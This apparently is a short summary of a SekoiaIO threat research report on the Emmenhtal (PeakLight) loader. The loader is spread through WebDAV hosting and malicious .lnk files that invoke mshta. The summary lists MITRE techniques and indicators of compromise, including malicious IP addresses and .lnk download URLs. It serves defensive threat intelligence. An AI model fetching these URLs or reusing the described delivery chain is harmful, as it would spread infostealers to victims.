Threat Research

WebDAV-as-a-Service: Exploring the Infrastructure of Emmenhtal Loader Distribution

SekoiaIO

The report tracks the Emmenhtal loader (PeakLight), a memory-only malware loader used to distribute multiple infostealers through a WebDAV-based hosting infrastructure. It also explores the potential for this setup to be offered as Infrastructure-as-a-Service to multiple threat actors, supported by consistent AS hosting and a wide payload ecosystem. #Emmenhtal #PeakLight #WebDAV #mshta #SelfAU3 #DarkGate #Amadey #Remcos #MeduzaStealer #DANABOT #Guloader #Redline #InfrastructureasAService

Keypoints

  • The Emmenhtal loader, also known as PeakLight, operates in memory, making it difficult to detect.
  • WebDAV is used to host malicious files, enabling distribution of the Emmenhtal loader.
  • Malicious “.lnk” files trigger downloads of the loader via the legitimate “mshta.exe” binary.
  • A wide variety of malware families, including SelfAU3, DarkGate, and Amadey, have been identified in the infrastructure.
  • The infrastructure may be part of an IaaS model for cybercriminals, offering services to multiple actors.
  • Consistent use of specific Autonomous Systems (AS) suggests a reliable hosting arrangement for distribution.
  • The report emphasizes ongoing vigilance and defensive measures against this evolving threat.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – ‘Exploitation of vulnerabilities in software to execute malicious code.’ The Emmenhtal loader leverages this capability to trigger payload execution via lnk-driven downloads.
  • [T1071] Command and Control – ‘Use of application layer protocols for command and control communication.’ The infrastructure uses app-layer protocols to communicate with C2 servers.
  • [T1053] Persistence – ‘Scheduled task/cron job to maintain persistence.’ The loader maintains its presence through scheduled tasks.
  • [T1003] Credential Access – ‘Credential dumping to obtain user credentials.’ Potential credential access to facilitate further exploitation.
  • [T1041] Exfiltration – ‘Exfiltration over command and control channel.’ Data may be exfiltrated via the C2 channel.

Indicators of Compromise

  • [IP Address] WebDAV hosting addresses observed – 104.131.7.207, 62.133.61.101, and other listed IPs
  • [URL] Malicious hosting URLs – 91.92.251.35/Downloads/solaris-docs.lnk, 206.188.196.28/Downloads/example.lnk

Read more: https://blog.sekoia.io/webdav-as-a-service-uncovering-the-infrastructure-behind-emmenhtal-loader-distribution/